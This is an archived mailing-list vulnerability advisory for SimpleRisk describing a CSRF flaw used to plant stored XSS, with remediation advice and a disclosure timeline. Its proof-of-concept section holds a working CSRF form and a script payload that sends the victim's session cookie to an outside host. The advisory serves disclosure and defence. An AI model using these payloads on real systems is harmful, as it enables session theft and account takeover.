'[Full-disclosure] SimpleRisk v.20130915-01 CSRF-XSS Account Compromise'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] SimpleRisk v.20130915-01 CSRF-XSS Account Compromise
From:       Ryan Dewhurst <ryandewhurst () gmail ! com>
Date:       2013-09-30 13:20:53
Message-ID: CAHw3cgTtwcTKrQWb11aduD52r2VX3NJWL0waepMCTGtFt0wRJA () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


1. *Advisory Information*

Title: SimpleRisk v.20130915-01 CSRF-XSS Account Compromise
Advisory ID: RS-2013-0001
Date Published: 2013-09-30

2. *Vulnerability Information*

Type: Cross-Site Request Forgery (CSRF) [CWE-352, OWASP-A8], Cross-Site
Scripting (XSS) [CWE-79, OWASP-A3]
Impact: Full Account Compromise
Remotely Exploitable: Yes
Locally Exploitable: Yes
Severity: High
CVE-ID: CVE-2013-5748 (CSRF) and CVE-2013-5749 (non-httponly cookie)

3. *Software Description*

SimpleRisk a simple and free tool to perform risk management activities.
Based entirely on open source technologies and sporting a Mozilla Public
License 2.0, a SimpleRisk instance can be stood up in minutes and instantly
provides the security professional with the ability to submit risks, plan
mitigations, facilitate management reviews, prioritize for project
planning, and track regular reviews. It is highly configurable and includes
dynamic reporting and the ability to tweak risk formulas on the fly. It is
under active development with new features being added all the time.
SimpleRisk is truly Enterprise Risk Management simplified. [0]

Homepage: http://www.simplerisk.org/
Download:
https://simplerisk.googlecode.com/files/simplerisk-20130915-001.tgz

4. *Vulnerability Description*

Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS)
have been discovered within SimpleRisk version 20130915-01 leading to
complete account compromise. The CSRF vulnerability is used to deliver the
XSS payload which accesses the authenticated user's session cookies and
transmits them to a third-party domain under the attacker's control. Once
the attacker has the user's session cookie, the attacker can authenticate
to the application as the user.

5. *Vulnerable Packages*

Only version 20130915-01 was tested which was the latest version at the
time of writing.

6. *Vendor Information, Solutions and Workarounds*

SimpleRisk released version 20130916-001 to address the issue.

7. *Credits*

These vulnerabilities were discovered by Ryan Dewhurst -
http://www.randomstorm.com/ - http://www.dewhurstsecurity.com/

8. *Proof of Concept (PoC)*

8.1 *Cross-Site Request Forgery (CSRF)*

The following CSRF PoC submits a POST request to the
prioritize_planning.php page with the XSS payload within the new_project
parameter.

----
<html>
  <body>
    <form action="
http://127.0.0.1/simplerisk/management/prioritize_planning.php"
method="POST">
      <input type="hidden" name="new&#95;project"
value="&lt;script&#32;src&#61;&#47;&#47;ethicalhack3r&#46;co&#46;uk&#47;files&#47;xss&#47;c&#46;j&gt;&lt;&#47;script&gt;"
 />
      <input type="hidden" name="add&#95;project" value="Add" />
      <input type="hidden" name="projects" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
----

8.2 *Stored Cross-Site Scripting (XSS)*

The prioritize_planning.php page accepts user supplied input via the
new_project POST parameter and then later outputs that data to the page
without first being sanitised or encoded. The following code was used to
inject JavaScript into the application's back-end database.

Payload: <script src=//ethicalhack3r.co.uk/files/xss/c.j></script>
Method: POST
Parameter: new_project

The c.j JavaScript file contained the following code which sends the user's
authenticated session cookie to a third-party domain:

document.write('<img src=//ethicalhack3r.co.uk/srx=' + document.cookie +
'>');

9. *Remediation*

9.1 *Cross-Site Request Forgery (CSRF)*

Set per page anti-csrf tokens (nonces) which are submitted with requests
and then validated by the server. Please refer to OWASP's CSRF Prevention
Cheat Sheet for further information. [1]

9.2 *Cross-Site Scripting (XSS)*

Properly sanitise and encode user supplied input and output. Please refer
to OWASP's XSS Prevention Cheat Sheet for further information. [2]

9.3 *Other Recommendations*

. Add the httponly flag to the session cookie so that JavaScript's
document.cookie can not access it. [3]
. Set the Content Security Policy (CSP) header to whitelist where
JavaScript is allowed to be loaded from. [4]
. Set the X-XSS-Protection header to ensure the browser's XSS filtering is
enabled. (only works for reflected XSS) [5]

10. *Report Timeline*

2013-09-16: SimpleRisk notified of issue.
2013-09-16: SimpleRisk acknoledged issue.
2013-09-16: SimpleRisk release new version.
2013-09-30: Advisory released.

11. *References*

[0] http://www.simplerisk.org/
[1]
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
[2]
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
[3] https://www.owasp.org/index.php/HttpOnly
[4] https://www.owasp.org/index.php/Content_Security_Policy
[5]
https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet#X-XSS-Protection
[6] http://www.randomstorm.com/
[7] http://www.dewhurstsecurity.com/


[Attachment #5 (text/html)]

<div dir="ltr"><div>1. *Advisory Information*</div><div><br></div><div>Title: SimpleRisk \
v.20130915-01 CSRF-XSS Account Compromise</div><div>Advisory ID: RS-2013-0001</div><div>Date \
Published: 2013-09-30</div><div><br></div> <div>2. *Vulnerability \
Information*</div><div><br></div><div>Type: Cross-Site Request Forgery (CSRF) [CWE-352, \
OWASP-A8], Cross-Site Scripting (XSS) [CWE-79, OWASP-A3]</div><div>Impact: Full Account \
Compromise</div><div>Remotely Exploitable: Yes</div> <div>Locally Exploitable: \
Yes</div><div>Severity: High</div><div>CVE-ID: CVE-2013-5748 (CSRF) and CVE-2013-5749 \
(non-httponly cookie)</div><div><br></div><div>3. *Software \
Description*</div><div><br></div><div>SimpleRisk a simple and free tool to perform risk \
management activities. Based entirely on open source technologies and sporting a Mozilla Public \
License 2.0, a SimpleRisk instance can be stood up in minutes and instantly provides the \
security professional with the ability to submit risks, plan mitigations, facilitate management \
reviews, prioritize for project planning, and track regular reviews. It is highly configurable \
and includes dynamic reporting and the ability to tweak risk formulas on the fly. It is under \
active development with new features being added all the time. SimpleRisk is truly Enterprise \
Risk Management simplified. [0]</div> <div><br></div><div>Homepage: <a \
href="http://www.simplerisk.org/">http://www.simplerisk.org/</a></div><div>Download: <a \
href="https://simplerisk.googlecode.com/files/simplerisk-20130915-001.tgz">https://simplerisk.googlecode.com/files/simplerisk-20130915-001.tgz</a></div>
 <div><br></div><div>4. *Vulnerability Description*</div><div><br></div><div>Cross-Site Request \
Forgery (CSRF) and Stored Cross-Site Scripting (XSS) have been discovered within SimpleRisk \
version 20130915-01 leading to complete account compromise. The CSRF vulnerability is used to \
deliver the XSS payload which accesses the authenticated user&#39;s session cookies and \
transmits them to a third-party domain under the attacker&#39;s control. Once the attacker has \
the user&#39;s session cookie, the attacker can authenticate to the application as the \
user.</div> <div><br></div><div>5. *Vulnerable Packages*</div><div><br></div><div>Only version \
20130915-01 was tested which was the latest version at the time of \
writing.</div><div><br></div><div>6. *Vendor Information, Solutions and Workarounds*</div> \
<div><br></div><div>SimpleRisk released version 20130916-001 to address the \
issue.</div><div><br></div><div>7. *Credits*</div><div><br></div><div>These vulnerabilities \
were discovered by Ryan Dewhurst - <a \
href="http://www.randomstorm.com/">http://www.randomstorm.com/</a> - <a \
href="http://www.dewhurstsecurity.com/">http://www.dewhurstsecurity.com/</a></div> \
<div><br></div><div>8. *Proof of Concept (PoC)*</div><div><br></div><div>8.1 *Cross-Site \
Request Forgery (CSRF)*</div><div><br></div><div>The following CSRF PoC submits a POST request \
to the prioritize_planning.php page with the XSS payload within the new_project \
parameter.</div> <div><br></div><div>----</div><div>&lt;html&gt;</div><div>  \
&lt;body&gt;</div><div>    &lt;form action=&quot;<a \
href="http://127.0.0.1/simplerisk/management/prioritize_planning.php">http://127.0.0.1/simplerisk/management/prioritize_planning.php</a>&quot; \
method=&quot;POST&quot;&gt;</div> <div>      &lt;input type=&quot;hidden&quot; \
name=&quot;new&amp;#95;project&quot; \
value=&quot;&amp;lt;script&amp;#32;src&amp;#61;&amp;#47;&amp;#47;ethicalhack3r&amp;#46;co&amp;#4 \
6;uk&amp;#47;files&amp;#47;xss&amp;#47;c&amp;#46;j&amp;gt;&amp;lt;&amp;#47;script&amp;gt;&quot; \
/&gt;</div> <div>      &lt;input type=&quot;hidden&quot; name=&quot;add&amp;#95;project&quot; \
value=&quot;Add&quot; /&gt;</div><div>      &lt;input type=&quot;hidden&quot; \
name=&quot;projects&quot; value=&quot;&quot; /&gt;</div><div>  &lt;input \
type=&quot;submit&quot; value=&quot;Submit request&quot; /&gt;</div><div>    \
&lt;/form&gt;</div><div>  \
&lt;/body&gt;</div><div>&lt;/html&gt;</div><div>----</div><div><br></div><div>8.2 *Stored \
Cross-Site Scripting (XSS)*</div> <div><br></div><div>The prioritize_planning.php page accepts \
user supplied input via the new_project POST parameter and then later outputs that data to the \
page without first being sanitised or encoded. The following code was used to inject JavaScript \
into the application&#39;s back-end database.</div> <div><br></div><div>Payload: &lt;script \
src=//<a href="http://ethicalhack3r.co.uk/files/xss/c.j">ethicalhack3r.co.uk/files/xss/c.j</a>&gt;&lt;/script&gt;</div><div>Method: \
POST</div><div>Parameter: new_project</div><div><br> </div><div>The c.j JavaScript file \
contained the following code which sends the user&#39;s authenticated session cookie to a \
third-party domain:</div><div><br></div><div>document.write(&#39;&lt;img src=//<a \
href="http://ethicalhack3r.co.uk/srx=">ethicalhack3r.co.uk/srx=</a>&#39; + document.cookie + \
&#39;&gt;&#39;);</div> <div><br></div><div>9. *Remediation*</div><div><br></div><div>9.1 \
*Cross-Site Request Forgery (CSRF)*</div><div><br></div><div>Set per page anti-csrf tokens \
(nonces) which are submitted with requests and then validated by the server. Please refer to \
OWASP&#39;s CSRF Prevention Cheat Sheet for further information. [1]</div> \
<div><br></div><div>9.2 *Cross-Site Scripting (XSS)*</div><div><br></div><div>Properly sanitise \
and encode user supplied input and output. Please refer to OWASP&#39;s XSS Prevention Cheat \
Sheet for further information. [2]</div> <div><br></div><div>9.3 *Other \
Recommendations*</div><div><br></div><div>. Add the httponly flag to the session cookie so that \
JavaScript&#39;s document.cookie can not access it. [3]</div><div>. Set the Content Security \
Policy (CSP) header to whitelist where JavaScript is allowed to be loaded from. [4]</div> \
<div>. Set the X-XSS-Protection header to ensure the browser&#39;s XSS filtering is enabled. \
(only works for reflected XSS) [5]</div><div><br></div><div>10. *Report \
Timeline*</div><div><br></div><div>2013-09-16: SimpleRisk notified of issue.</div> \
<div>2013-09-16: SimpleRisk acknoledged issue.</div><div>2013-09-16: SimpleRisk release new \
version.</div><div>2013-09-30: Advisory released.</div><div><br></div><div>11. \
*References*</div><div><br></div><div>[0] <a \
href="http://www.simplerisk.org/">http://www.simplerisk.org/</a></div> <div>[1] <a \
href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet"> \
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet</a></div><div>[2] \
<a href="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet">http \
s://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet</a></div> \
<div>[3] <a href="https://www.owasp.org/index.php/HttpOnly">https://www.owasp.org/index.php/HttpOnly</a></div><div>[4] \
<a href="https://www.owasp.org/index.php/Content_Security_Policy">https://www.owasp.org/index.php/Content_Security_Policy</a></div>
 <div>[5] <a href="https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet#X-XSS-Protection"> \
https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet#X-XSS-Protection</a></div><div>[6] \
<a href="http://www.randomstorm.com/">http://www.randomstorm.com/</a></div> <div>[7] <a \
href="http://www.dewhurstsecurity.com/">http://www.dewhurstsecurity.com/</a></div></div>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic